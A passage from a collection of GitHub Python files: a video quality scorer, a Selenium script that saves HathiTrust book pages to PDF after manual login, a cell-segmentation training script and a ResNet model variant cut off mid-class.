print('[Info] 视频尺寸: {}'.format((h, w)))\n return cap, n_frame, fps, (w, h)\n\n def predict_video(self, vid_path):\n vid_name = vid_path.split('/')[-1]\n print('[Info] 视频路径: {}, 名称: {}'.format(vid_path, vid_name))\n cap, n_frame, fps, (w, h) = self.init_vid(vid_path)\n\n print('[Info] 视频帧数: {}'.format(n_frame))\n ip = ImgPredictor()\n\n gap = n_frame // 50\n\n s_tech_list, s_aest_list = [], []\n for i in range(0, n_frame, gap):\n cap.set(cv2.CAP_PROP_POS_FRAMES, i)\n ret, frame = cap.read()\n\n s_tech, s_aest = ip.predict_img_op(frame)\n s_tech_list.append(s_tech)\n s_aest_list.append(s_aest)\n\n # print('[Info] 视频 质量: {}, 美学: {}'.format(s_tech, s_aest))\n\n avg_tech = avg_list(s_tech_list)\n avg_aest = avg_list(s_aest_list)\n\n print('[Info] 均值 质量: {}, 美学: {}'.format(avg_tech, avg_aest))\n\n return vid_name, avg_tech, avg_aest\n\n\ndef video_predictor_test():\n v_path = os.path.join(DATA_DIR, 'videos', '9c59e6b073.mp4')\n vp = VideoPredictor()\n vp.predict_video(v_path)\n\n\ndef video_dir_test():\n vid_p_dir = os.path.join(DATA_DIR, 'videos', 'positive')\n vid_n_dir = os.path.join(DATA_DIR, 'videos', 'negative')\n paths_p_list, names_p_list = traverse_dir_files(vid_p_dir)\n paths_n_list, names_n_list = traverse_dir_files(vid_n_dir)\n\n names_list = names_p_list + names_n_list\n paths_list = paths_p_list + paths_n_list\n\n vp = VideoPredictor()\n\n out_dir = os.path.join(DATA_DIR, 'outs')\n mkdir_if_not_exist(out_dir)\n out_excel_file = os.path.join(out_dir, 'res.xlsx')\n # create_file(out_excel_file)\n\n # add_sheet is used to create sheet.\n workbook = xlsxwriter.Workbook(out_excel_file)\n worksheet = workbook.add_worksheet()\n\n row = 0\n\n print('[Info] 视频总数: {}'.format(len(names_list)))\n worksheet.write(row, 0, u'视频名称')\n worksheet.write(row, 1, u'质量评分')\n worksheet.write(row, 2, u'美学评分')\n row += 1\n\n vid_list, tech_list, aest_list = [], [], []\n for name, path in zip(names_list, paths_list):\n try:\n vid_name, avg_tech, avg_aest = vp.predict_video(path)\n print('[Info] 视频: {}, 质量: {}, 美学: {}'.format(vid_name, avg_tech, avg_aest))\n vid_list.append(vid_name)\n tech_list.append(avg_tech)\n aest_list.append(avg_aest)\n\n worksheet.write(row, 0, vid_name)\n worksheet.write(row, 1, avg_tech)\n worksheet.write(row, 2, avg_aest)\n row += 1\n # data_line = vid_name + \",\" + str(avg_tech) + \",\" + str(avg_aest)\n # write_line(out_json_file, data_line)\n except Exception as e:\n print(e)\n print('[Info] 错误视频: {}'.format(name))\n\n workbook.close()\n\n\ndef main():\n # video_predictor_test()\n video_dir_test()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SpikeKing/vqa","sub_path":"VideoPredictor.py","file_name":"VideoPredictor.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6930184348","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom PIL import Image\nfrom os import makedirs, listdir\nfrom os.path import isfile, join, exists, splitext\nimport fire\n\nCHROMEDRIVER_PATH = '/path/to/chromedriver'\nSAVE_PATH = '/path/to/where/you/want/to/save'\n# can't go directly to the SSO login page. Need to be redirected.\nSSO_INTRO_URL = 'https://bobcat.library.nyu.edu/primo-explore/search?query=any,contains,Art%20of%20the%20Past:%20Sources%20and%20Reconstruction:%20Proceedings%20of%20the%20First%20Symposium%20of%20the%20Art%20Technological%20Source%20Research%20Study%20Group&tab=all&search_scope=all&sortby=rank&vid=NYU&lang=en_US&mode=basic'\n\ndef check_for_auth():\n user_input = input('Press any key to continue, once logged in using the new chromedriver window.')\n\ndef check_for_completeness():\n user_input = input('Press any key to continue, once verified that all the pages successfully downloaded.')\n\ndef check_for_yes():\n user_input = input('Did that work? You can check and see if the chromedriver window successfully loaded any pages, and/or new files were saved to the book folder. If it did type \"yes\". Anything other than that will rerun the last step.')\n return user_input == 'yes'\n\ndef run(book_id, start, end):\n driver = auth()\n check_for_auth()\n\n try:\n driver = retrieve(driver, book_id, start, end)\n except:\n print('hit an error')\n\n # rerun until the user confirms it worked (it's flaky)\n while not check_for_yes():\n try:\n driver = retrieve(driver, book_id, start, end)\n except:\n print('hit an error')\n\n check_for_completeness()\n\n combine(book_id)\n quit(driver)\n\n\ndef auth():\n print('Opening chromedriver to authenticate with SSO')\n driver = webdriver.Chrome(executable_path=CHROMEDRIVER_PATH)\n driver.get(SSO_INTRO_URL)\n wait = WebDriverWait(driver, 10)\n return driver\n\n\ndef retrieve(driver, book_id, start, end):\n \"\"\"Function that retrieves page-by-page png files for a book id.\"\"\"\n # book_id = 'mdp.39015025096234' # (an example)\n print('Retrieving pages {0} - {1} for doc {2}'.format(start, end, book_id))\n\n directory = join(SAVE_PATH, '{0}'.format(book_id))\n if not exists(directory):\n makedirs(directory)\n\n for page_num in range(int(start),int(end) + 1):\n page_url = 'https://babel.hathitrust.org/cgi/imgsrv/image?id={0};seq={1};size=250;rotation=0'.format(book_id, page_num)\n driver.get(page_url)\n wait = WebDriverWait(driver, 8)\n\n full_path = join(directory, 'page_{0}.png'.format(page_num))\n\n page_img = driver.find_element_by_tag_name('img')\n _save_image(driver, page_img, full_path)\n print('\\tRetrieved page {0} ({1})'.format(page_num, full_path))\n\n return driver\n\n\ndef combine(book_id):\n print('Combining pages...')\n path = join(SAVE_PATH, '{0}'.format(book_id))\n files = [f for f in listdir(path) if isfile(join(path, f))]\n sorted_files = sorted(files,key=lambda x: int(splitext(x)[0].split(\"_\")[1])) \n\n # handle first image separately, then append others\n pil_image1 = Image.open(join(path,sorted_files[0])) \n converted1 = pil_image1.convert('RGB')\n\n converted_img_list = []\n for img in sorted_files[1:]:\n pil_image = Image.open(join(path,img)) \n converted = pil_image.convert('RGB')\n converted_img_list.append(converted) \n\n outfile_name = join(path, '{0}.pdf'.format(book_id))\n converted1.save(outfile_name, save_all=True, append_images=converted_img_list)\n\ndef quit(driver):\n print('Quitting session')\n driver.quit()\n\n#################################\n############ HELPERS ############\n#################################\ndef _save_image(chrome, element, save_path):\n # in case the image isn't isn't in the view yet\n location = element.location_once_scrolled_into_view\n\n # saves screenshot of entire page\n chrome.save_screenshot(save_path)\n\n # crop after in memory, using PIL\n image = Image.open(save_path)\n width = 1000\n height = 1419\n left = 700\n bottom = height\n image = image.crop((left, 0, left + width, height)) \n image.save(save_path, 'png') # saves new cropped image\n\nif __name__ == '__main__':\n fire.Fire()\n","repo_name":"emilybfrank/hathitrust-export","sub_path":"book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2332460469","text":"# import unet_dist2center as dc\n# import unet_3d_pixclass as u3\n# import unet_2d_pixclass as u2\n# import unet_ph3regress as ph3\n# import unet_dist2bg as bg\nfrom segtools.defaults.ipython_remote import *\nimport train_seg_lib as ts\nimport unet_3d_cele as ce\nsavedir = Path('training/ce_test6/'); savedir.mkdir(exist_ok=True);\n# homedir = Path('./')\n# loaddir = Path('training/ce_022/')\n# mypath_opt = savedir\nm = ce\n\n\ndef rm_if_exists_and_copy(p):\n p = Path(p)\n if (savedir / p).exists():\n os.remove(savedir / p)\n shutil.copy(p, savedir)\n\nif __name__ == '__main__':\n loaddir = Path(sys.argv[1])\n savedir = Path(sys.argv[2])\n mypath_opt = savedir\n print(\"loaddir, savedir\", loaddir, savedir)\n\n savedir.mkdir(exist_ok=True)\n # shutil.copy(__file__, savedir)\n for p in ['train_seg_lib.py', 'unet_3d_cele.py', 'unet_dist2center.py', 'unet_2d_pixclass.py', 'unet_3d_pixclass.py']:\n rm_if_exists_and_copy(p)\n\n\n# trials = m.optimize_seg_joint(savedir, max_evals=200)\nm.fig3pkl()\nsys.exit(0)\n\n\nif False:\n m.doitall(savedir)\n\nif False:\n imgdirs = [\"Fluo-N3DH-CE/01/\", \"Fluo-N3DH-CE/02/\", \"Fluo-N3DH-CE_challenge/01/\", \"Fluo-N3DH-CE_challenge/02/\"]\n pimgextensions = ['train1/', 'train2/', 'chall1/', 'chall2']\n # imgdirs = [\"Fluo-N3DH-CE/02/\", \"Fluo-N3DH-CE_challenge/01/\", \"Fluo-N3DH-CE_challenge/02/\"]\n # pimgextensions = ['train2/', 'chall1/', 'chall2']\n ws = [3,4,5,6]\n for i in range(len(pimgextensions)):\n # plt.figure()\n for t in range(29,31):\n imgdir = Path(imgdirs[i])\n pimgdir = Path(\"training/ce_{:03d}/train_cp/pimgs/\".format(t))\n extdir = pimgdir / pimgextensions[i]\n # cellcounts = eval((extdir / 'counts.txt').open().read())\n plt.plot([c[1] for c in cellcounts], label=str(ws[t-27]))\n zcolordir = extdir / 'zcolor'\n n = 250 if i == 0 else 190\n m.pimgs2movie(extdir, imgdir, zcolordir, range(0,n))\n watersheddir = extdir / 'watershed'\n savedir = watersheddir / 'movie'\n m.hyps2movie(watersheddir,imgdir,savedir,range(0,n))\n # plt.legend()\n # plt.title(pimgextensions[i])\n # plt.savefig(str(pimgdir / 'traj{:02d}.png'.format(ws[i])))\n\n sys.exit(0)\n\n## make pimgs\n\nif True:\n imgdirs = [\"Fluo-N3DH-CE/01/\", \"Fluo-N3DH-CE/02/\", \"Fluo-N3DH-CE_challenge/01/\", \"Fluo-N3DH-CE_challenge/02/\"]\n pimgextensions = ['train1/', 'train2/', 'chall1/', 'chall2']\n\n net = m.build_net((120,120,120,1), 2, activation='softmax')\n net.load_weights('training/ce_059/train_cp/epochs/w_match_0.935_132.h5')\n pimgdir = Path('training/ce_059/train_cp/pimgs/')\n m.save_pimgs(net, pimgdir/'train1', Path(imgdirs[0]), range(0,250)) #challenge=False,n=1)\n m.save_pimgs(net, pimgdir/'train2', Path(imgdirs[1]), range(0,250)) #challenge=False,n=2)\n m.save_pimgs(net, pimgdir/'chall1', Path(imgdirs[2]), range(0,190)) #challenge=True,n=1)\n m.save_pimgs(net, pimgdir/'chall2', Path(imgdirs[3]), range(0,190)) #challenge=True,n=2)\n\n print('success')\n sys.exit(0)\n\n## dist2bg model\n\nif False:\n # rawdata = m.build_rawdata(homedir)\n\n rawgt = pickle.load(open('training/ce_test/rawgt.pkl','rb'))\n\n net = m.build_net((120,120,120,1),1,activation='linear')\n\n # lod = np.array(m.revertdict(rawgt['gt']))\n # rawgt['train'] = m.invertdict(lod[[0,3,4]])\n # rawgt['vali'] = m.invertdict(lod[[1,2]])\n\n tg = m.datagen(rawgt['train'], targetname='target2')\n vg = m.datagen(rawgt['vali'], targetname='target2')\n\n traindir = savedir / 'train_d2bg/'\n traindir.mkdir(exist_ok=True)\n\n examples = [(x[0],y[0,...,:-1]) for (x,y) in itertools.islice(vg, 5)]\n hical = m.Histories(examples, traindir)\n\n history = ts.train_gen(net, tg, vg, traindir, n_epochs=80, steps_per_epoch=30, callbacks=[hical])\n ts.plot_history(history, start=0, savepath=traindir)\n net.load_weights(history['weightname'])\n\n pimg = m.predict(net, rawgt['vali']['source'], outchan=1)\n res = m.show_rawdata(rawgt['vali'],pimg,1)\n io.imsave(traindir / 'result.png', res)\n\n # m.optimize_seg_separate_net(net,homedir,savedir)\n\n print('success')\n sys.exit(0)\n\n## render movies from a pretrained classifier\n\nif False:\n # traindir = savedir / 'train_cp'; traindir.mkdir(exist_ok=True);\n # resultdir = traindir / 'results'; resultdir.mkdir(exist_ok=True);\n pimgdir = Path('training/ce_014/pimgs2/'); pimgdir.mkdir(exist_ok=True);\n # renderdir = pimgdir / 'figs'; renderdir.mkdir(exist_ok=True);\n\n net = m.build_net((120,120,120,1), 2, activation='softmax')\n net.load_weights('training/ce_012/train_cp/w001_final.h5')\n m.save_pimgs(net,pimgdir)\n # m.make_movie(net,renderdir,0,250)\n\n sys.exit(0)\n\n## train and evaluate classifier\n\nif True:\n traindir = savedir / 'train_cp/'; traindir.mkdir(exist_ok=True);\n resultdir = traindir / 'results/'; resultdir.mkdir(exist_ok=True);\n epochdir = traindir / 'epochs/'; epochdir.mkdir(exist_ok=True);\n pimgdir = traindir / 'pimgs/'; pimgdir.mkdir(exist_ok=True);\n\n rawdata = {'train':m.times2raw(range(0,195,10),1,homedir), 'vali':m.times2raw(range(5,195,10),1,homedir)}\n # rawdata = {'train':m.times2raw([185],1,homedir), 'vali':m.times2raw([155],1,homedir)}\n # rawdata = {'train':m.times2raw([40, 100],1,homedir), 'vali':m.times2raw([30, 105],1,homedir)}\n # rawdata = {'train':times2raw([10,20,50,100,150],1,homedir), 'vali':times2raw([25,105],1,homedir)}\n # rawdata = {'train':times2raw([10, 60, 140, 185],1,homedir), 'vali':times2raw([20, 75, 155, 175],1,homedir)}\n\n for i in [1,2,3]:\n res = m.show_rawdata(rawdata['vali'],i=i)\n io.imsave(traindir / 'rawdata_vali_{:02d}.png'.format(i), res)\n\n weights = np.array([1,1])\n weights[1] = 16.0\n weights = weights / weights.sum()\n weights = m.K.variable(weights)\n\n\n # net = m.build_net((120,120,120,1),2,activation='softmax',weights=weights)\n net = m.build_net((120,120,120,1),2,activation='softmax')\n\n tg = m.datagen(rawdata['train'])\n vg = m.datagen(rawdata['vali'])\n\n examples = [(x[0],y[0,...,:-1]) for (x,y) in itertools.islice(vg, 5)]\n hical = m.Histories(examples, epochdir, weights=weights)\n\n history = ts.train_gen(net, tg, vg, traindir, n_epochs=60, steps_per_epoch=20, callbacks=[hical])\n ts.plot_history(history, start=1, savepath=traindir)\n net.load_weights(history['weightname'])\n\n results = m.analyze_cpnet(net,rawdata,resultdir)\n pickle.dump(results, open(resultdir / 'results.pkl', 'wb'))\n\n rawgt = m.build_gt_rawdata(homedir)\n results_gt = m.analyze_cpnet(net,rawgt,resultdir)\n pickle.dump(results_gt, open(resultdir / 'results_gt.pkl', 'wb'))\n\n print('success')\n sys.exit(0)\n\n## analysis\n\nresults_gt = pickle.load(open(resultdir / 'results_gt.pkl', 'rb'))\ngtdata = m.labnames2imgs_cens(m.labnames(1),1)\nm.mk_hyps_compute_seg(gtdata, results_gt)\n\n## old training\n\nrawdata = m.build_rawdata(homedir)\n# pickle.dump(rawdata, open(savedir / 'rawdata.pkl','wb'))\ntrainable = m.build_trainable(rawdata)\nm.show_trainvali(trainable, savedir)\n\nnet = m.build_net(trainable)\nns = trainable['vali']['xs'].shape[0]\nns = floor(np.sqrt(ns))\n\ntraindir = savedir / 'train/'\ntraindir.mkdir()\nhical = m.Histories(trainable['vali']['xs'][::ns], trainable['vali']['ys'][::ns], traindir)\n\nhistory = ts.train(net, trainable, traindir, n_epochs=40, batchsize=1,callbacks=[hical])\nhistory = history.history\n# history = eval(open(loaddir / 'history.txt','r').read())\n\nts.plot_history(history, savedir)\nnet.load_weights(history['weightname'])\nm.predict_trainvali(net, trainable, savedir)\npimg = m.predict(net, rawdata['vali']['source'])\nnp.save(savedir / 'pimg', pimg)\n\nsys.exit(0)\n# m.show_trainvali(trainable, savepath=savedir)\n\n## train net and plot trajectories\n\nsavedir = savedir / \"remove\"\nval_losses = []\nfor i in range(10):\n trainable = m.build_trainable(rawdata)\n savedir = savedir.parent / \"t{:03d}\".format(i)\n savedir.mkdir(exist_ok=True)\n net = m.build_net(trainable)\n # net.load_weights('training/ph3_009/t000/w001.h5')\n traindir = savedir / 'epochs'\n traindir.mkdir()\n history = ts.train(net, trainable, traindir, n_epochs=150, batchsize=1)\n history = history.history\n best_val = min(history['val_loss'])\n val_losses.append(best_val)\n print(\"HISTORY: \", i, \" \", best_val)\n ts.plot_history(history, savedir)\n m.predict_trainvali(net, trainable, savedir)\n json.dump(history, open(savedir / 'history.json', 'w'), indent=2, cls=NumpyEncoder)\n\nsavedir = savedir.parent\n\nprint(\"best validation losses:\", val_losses, file=open(savedir/'val_losses.txt','w'))\nidx_best = np.argmin(val_losses)\nprint(\"idx_best\", idx_best)\n\n## load weights after network optimization and view results\n\nnet.load_weights(str(loaddir / \"t{:03d}/w001.h5\".format(idx_best)))\nm.predict_trainvali(net, trainable, savedir)\npimg = m.predict(net, rawdata['img'], trainable['xsem'], trainable['ysem'])\nnp.save(savedir / 'pimg', pimg)\n\nm.show_results(pimg, rawdata, trainable, savepath=savedir)\n\n# ts.max_z_divchan(pimg, savedir)\n# ts.show_results(pimg, rawdata, savedir)\n# ts.find_divisions(pimg, savedir)\n\n## optimize the segmentation\n\nsegparams = ts.segparams()\ngt_patches = dict()\ngt_patches['gt_slices'] = rawdata['gt_slices'][:-4]\ngt_patches['inds_labeled_slices'] = rawdata['inds_labeled_slices'][:, :-4]\nbest = ts.optimize_segmentation(pimg[[0]], {**rawdata, **gt_patches}, segparams, mypath_opt)\nhyp = np.array([segparams['function'](x, best) for x in pimg])\nseg_scores = ts.compute_seg_on_slices(hyp, rawdata)\nprint(seg_scores)\nts.analyze_hyp(hyp, rawdata, segparams, savedir)\nnhls = ts.build_nhl(hyp, rawdata, savedir)\ntr = ts.track_nhls(nhls, savedir)\n\nhistory = \"\"\"\n\n## Mon Jul 30 00:35:38 2018\n\nRecently added loop over training.\nNow regen trianing data and retrain model each iteration.\nBUGFIX. now we should be able to train multiple models and predict from best.\n\n3 deep 16 starting features 5 conv-width gives by far the best results.\nchose best over ten models trained. The variability of the best val loss is large!\nbest val loss in range [0.15, 0.22] with many 0.18 and 0.19 values.\nseg is 0.805 ! best so far.\n\n*Does the variability come from the train/vali split, model initialization or SGD?*\n\n\n\n\"\"\"","repo_name":"colemanbroad/fisheye","sub_path":"src/trainseg_ipy.py","file_name":"trainseg_ipy.py","file_ext":"py","file_size_in_byte":9974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20245280759","text":"import math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD\nfrom .helpers import build_model_with_cfg\nfrom .layers import DropBlock2d, DropPath, AvgPool2dSame, BlurPool2d, create_attn, create_classifier\nfrom .registry import register_model\n\n__all__ = ['ResNet', 'BasicBlock', 'Bottleneck'] # model_registry will add each entrypoint fn to this\n\n\ndef _mcfg(**kwargs):\n cfg = dict()\n cfg.update(**kwargs)\n return cfg\n\n\n# Model FLOPS = three trailing digits * 10^8\nmodel_cfgs = dict(\n resnet18_hil=_mcfg(kernel_size=(3, 3), padding=(1, 1)),\n resnet34_hil=_mcfg(kernel_size=(3, 3), padding=(1, 1)),\n resnet26_hil=_mcfg(kernel_size=(3, 3), padding=(1, 1)),\n resnet50_hil=_mcfg(kernel_size=(3, 3), padding=(1, 1)),\n resnet101_hil=_mcfg(kernel_size=(3, 3), padding=(1, 1)),\n resnet152_hil=_mcfg(kernel_size=(3, 3), padding=(1, 1)),\n resnet200_hil=_mcfg(kernel_size=(3, 3), padding=(1, 1)),\n resnet50_3x1_hil=_mcfg(kernel_size=(3, 1), padding=(1, 0)),\n)\n\ndef _cfg(url='', **kwargs):\n return {\n 'url': url,\n 'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': (7, 7),\n 'crop_pct': 0.875, 'interpolation': 'bilinear',\n 'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD,\n 'first_conv': 'conv1', 'classifier': 'fc',\n **kwargs\n }\n\n\ndefault_cfgs = {\n # ResNet and Wide ResNet\n 'resnet18_hil': _cfg(url=''),\n 'resnet34_hil': _cfg(url=''),\n 'resnet26_hil': _cfg(url='', interpolation='bicubic'),\n 'resnet50_hil': _cfg(url='', interpolation='bicubic'),\n 'resnet101_hil': _cfg(url='', interpolation='bicubic'),\n 'resnet152_hil': _cfg(url='', interpolation='bicubic'),\n 'resnet200_hil': _cfg(url='', interpolation='bicubic'),\n\n 'resnet50_3x1_hil': _cfg(url='', interpolation='bicubic', kernel_size=(3, 1), padding=(1, 0)),\n}\n\n\ndef get_padding(kernel_size, stride, dilation=1):\n padding = ((stride - 1) + dilation * (kernel_size - 1)) // 2\n return padding\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, cfg, inplanes, planes, stride=1, downsample=None, cardinality=1, base_width=64,\n reduce_first=1, dilation=1, first_dilation=None, act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d,\n attn_layer=None, aa_layer=None, drop_block=None, drop_path=None):\n super(BasicBlock, self).__init__()\n\n assert cardinality == 1, 'BasicBlock only supports cardinality of 1'\n assert base_width == 64, 'BasicBlock does not support changing base width'\n first_planes = planes // reduce_first\n outplanes = planes * self.expansion\n first_dilation = first_dilation or dilation\n use_aa = aa_layer is not None and (stride == 2 or first_dilation != dilation)\n\n self.conv1 = nn.Conv2d(\n inplanes, first_planes, kernel_size=cfg['kernel_size'], stride=1 if use_aa else stride, padding=cfg['padding'],\n dilation=first_dilation, bias=False)\n self.bn1 = norm_layer(first_planes)\n self.act1 = act_layer(inplace=True)\n self.aa = aa_layer(channels=first_planes, stride=stride) if use_aa else None\n\n self.conv2 = nn.Conv2d(\n first_planes, outplanes, kernel_size=cfg['kernel_size'], padding=cfg['padding'], dilation=dilation, bias=False)\n self.bn2 = norm_layer(outplanes)\n\n self.se = create_attn(attn_layer, outplanes)\n\n self.act2 = act_layer(inplace=True)\n self.downsample = downsample\n self.stride = stride\n self.dilation = dilation\n self.drop_block = drop_block\n self.drop_path = drop_path\n\n def zero_init_last_bn(self):\n nn.init.zeros_(self.bn2.weight)\n\n def forward(self, x):\n residual = x\n\n x = self.conv1(x)\n x = self.bn1(x)\n if self.drop_block is not None:\n x = self.drop_block(x)\n x = self.act1(x)\n if self.aa is not None:\n x = self.aa(x)\n\n x = self.conv2(x)\n x = self.bn2(x)\n if self.drop_block is not None:\n x = self.drop_block(x)\n\n if self.se is not None:\n x = self.se(x)\n\n if self.drop_path is not None:\n x = self.drop_path(x)\n\n if self.downsample is not None:\n residual = self.downsample(residual)\n x += residual\n x = self.act2(x)\n\n return x\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, cfg, inplanes, planes, stride=1, downsample=None, cardinality=1, base_width=64,\n reduce_first=1, dilation=1, first_dilation=None, act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d,\n attn_layer=None, aa_layer=None, drop_block=None, drop_path=None):\n super(Bottleneck, self).__init__()\n\n width = int(math.floor(planes * (base_width / 64)) * cardinality)\n first_planes = width // reduce_first\n outplanes = planes * self.expansion\n first_dilation = first_dilation or dilation\n use_aa = aa_layer is not None and (stride == 2 or first_dilation != dilation)\n\n self.conv1 = nn.Conv2d(inplanes, first_planes, kernel_size=1, bias=False)\n self.bn1 = norm_layer(first_planes)\n self.act1 = act_layer(inplace=True)\n\n self.conv2 = nn.Conv2d(\n first_planes, width, kernel_size=cfg['kernel_size'], stride=1 if use_aa else stride,\n padding=cfg['padding'], dilation=first_dilation, groups=cardinality, bias=False)\n self.bn2 = norm_layer(width)\n self.act2 = act_layer(inplace=True)\n self.aa = aa_layer(channels=width, stride=stride) if use_aa else None\n\n self.conv3 = nn.Conv2d(width, outplanes, kernel_size=1, bias=False)\n self.bn3 = norm_layer(outplanes)\n\n self.se = create_attn(attn_layer, outplanes)\n\n self.act3 = act_layer(inplace=True)\n self.downsample = downsample\n self.stride = stride\n self.dilation = dilation\n self.drop_block = drop_block\n self.drop_path = drop_path\n\n def zero_init_last_bn(self):\n nn.init.zeros_(self.bn3.weight)\n\n def forward(self, x):\n residual = x\n\n x = self.conv1(x)\n x = self.bn1(x)\n if self.drop_block is not None:\n x = self.drop_block(x)\n x = self.act1(x)\n\n x = self.conv2(x)\n x = self.bn2(x)\n if self.drop_block is not None:\n x = self.drop_block(x)\n x = self.act2(x)\n if self.aa is not None:\n x = self.aa(x)\n\n x = self.conv3(x)\n x = self.bn3(x)\n if self.drop_block is not None:\n x = self.drop_block(x)\n\n if self.se is not None:\n x = self.se(x)\n\n if self.drop_path is not None:\n x = self.drop_path(x)\n\n if self.downsample is not None:\n residual = self.downsample(residual)\n x += residual\n x = self.act3(x)\n\n return x\n\n\ndef downsample_conv(\n in_channels, out_channels, kernel_size, stride=1, dilation=1, first_dilation=None, norm_layer=None):\n norm_layer = norm_layer or nn.BatchNorm2d\n kernel_size = 1 if stride == 1 and dilation == 1 else kernel_size\n first_dilation = (first_dilation or dilation) if kernel_size > 1 else 1\n p = get_padding(kernel_size, stride, first_dilation)\n\n return nn.Sequential(*[\n nn.Conv2d(\n in_channels, out_channels, kernel_size, stride=stride, padding=p, dilation=first_dilation, bias=False),\n norm_layer(out_channels)\n ])\n\n\ndef downsample_avg(\n in_channels, out_channels, kernel_size, stride=1, dilation=1, first_dilation=None, norm_layer=None):\n norm_layer = norm_layer or nn.BatchNorm2d\n avg_stride = stride if dilation == 1 else 1\n if stride == 1 and dilation == 1:\n pool = nn.Identity()\n else:\n avg_pool_fn = AvgPool2dSame if avg_stride == 1 and dilation > 1 else nn.AvgPool2d\n pool = avg_pool_fn(2, avg_stride, ceil_mode=True, count_include_pad=False)\n\n return nn.Sequential(*[\n pool,\n nn.Conv2d(in_channels, out_channels, 1, stride=1, padding=0, bias=False),\n norm_layer(out_channels)\n ])\n\n\ndef drop_blocks(drop_block_rate=0.):\n return [\n None, None,\n DropBlock2d(drop_block_rate, 5, 0.25) if drop_block_rate else None,\n DropBlock2d(drop_block_rate, 3, 1.00) if drop_block_rate else None]\n\n\ndef make_blocks(\n cfg, block_fn, channels, block_repeats, inplanes, reduce_first=1, output_stride=32,\n down_kernel_size=1, avg_down=False, drop_block_rate=0., drop_path_rate=0., **kwargs):\n stages = []\n feature_info = []\n net_num_blocks = sum(block_repeats)\n net_block_idx = 0\n net_stride = 4\n dilation = prev_dilation = 1\n for stage_idx, (planes, num_blocks, db) in enumerate(zip(channels, block_repeats, drop_blocks(drop_block_rate))):\n stage_name = f'layer{stage_idx + 1}' # never liked this name, but weight compat requires it\n stride = 1 if stage_idx == 0 else 2\n if net_stride >= output_stride:\n dilation *= stride\n stride = 1\n else:\n net_stride *= stride\n\n downsample = None\n if stride != 1 or inplanes != planes * block_fn.expansion:\n down_kwargs = dict(\n in_channels=inplanes, out_channels=planes * block_fn.expansion, kernel_size=down_kernel_size,\n stride=stride, dilation=dilation, first_dilation=prev_dilation, norm_layer=kwargs.get('norm_layer'))\n downsample = downsample_avg(**down_kwargs) if avg_down else downsample_conv(**down_kwargs)\n\n block_kwargs = dict(reduce_first=reduce_first, dilation=dilation, drop_block=db, **kwargs)\n blocks = []\n for block_idx in range(num_blocks):\n downsample = downsample if block_idx == 0 else None\n stride = stride if block_idx == 0 else 1\n block_dpr = drop_path_rate * net_block_idx / (net_num_blocks - 1) # stochastic depth linear decay rule\n blocks.append(block_fn(cfg, inplanes, planes, stride, downsample, first_dilation=prev_dilation,\n drop_path=DropPath(block_dpr) if block_dpr > 0. else None, **block_kwargs))\n prev_dilation = dilation\n inplanes = planes * block_fn.expansion\n net_block_idx += 1\n\n stages.append((stage_name, nn.Sequential(*blocks)))\n feature_info.append(dict(num_chs=inplanes, reduction=net_stride, module=stage_name))\n\n return stages, feature_info\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, cfg, block, layers, num_classes=1000, in_chans=3,\n cardinality=1, base_width=64, stem_width=64, stem_type='',\n output_stride=32, block_reduce_first=1, down_kernel_size=1, avg_down=False,\n act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d, aa_layer=None, drop_rate=0.0, drop_path_rate=0.,\n drop_block_rate=0., global_pool='avg', zero_init_last_bn=True, block_args=None):\n block_args = block_args or dict()\n assert output_stride in (8, 16, 32)\n self.num_classes = num_classes\n self.drop_rate = drop_rate\n super(ResNet, self).__init__()\n\n inplanes = 64\n # self.conv1 = nn.Conv2d(in_chans, inplanes, kernel_size=7, stride=2, padding=3, bias=False)\n self.conv1 = nn.Sequential(*[nn.Conv2d(in_chans, inplanes, kernel_size=cfg['kernel_size'], stride=2, padding=cfg['padding'], bias=False),\n norm_layer(inplanes),\n act_layer(inplace=True),\n nn.Conv2d(inplanes, inplanes, kernel_size=cfg['kernel_size'], stride=1, padding=cfg['padding'], bias=False),\n norm_layer(inplanes),\n act_layer(inplace=True),\n nn.Conv2d(inplanes, inplanes, kernel_size=cfg['kernel_size'], stride=1, padding=cfg['padding'], bias=False),\n ])\n self.bn1 = norm_layer(inplanes)\n self.act1 = act_layer(inplace=True)\n self.feature_info = [dict(num_chs=inplanes, reduction=2, module='act1')]\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n\n # Feature Blocks\n channels = [64, 128, 256, 512]\n stage_modules, stage_feature_info = make_blocks(\n cfg, block, channels, layers, inplanes, cardinality=cardinality, base_width=base_width,\n output_stride=output_stride, reduce_first=block_reduce_first, avg_down=avg_down,\n down_kernel_size=down_kernel_size, act_layer=act_layer, norm_layer=norm_layer, aa_layer=aa_layer,\n drop_block_rate=drop_block_rate, drop_path_rate=drop_path_rate, **block_args)\n for stage in stage_modules:\n self.add_module(*stage) # layer1, layer2, etc\n self.feature_info.extend(stage_feature_info)\n\n # Head (Pooling and Classifier)\n self.num_features = 512 * block.expansion\n self.global_pool, self.fc = create_classifier(self.num_features, self.num_classes, pool_type=global_pool)\n\n for n, m in self.named_modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.)\n nn.init.constant_(m.bias, 0.)\n if zero_init_last_bn:\n for m in self.modules():\n if hasattr(m, 'zero_init_last_bn'):\n m.zero_init_last_bn()\n\n def get_classifier(self):\n 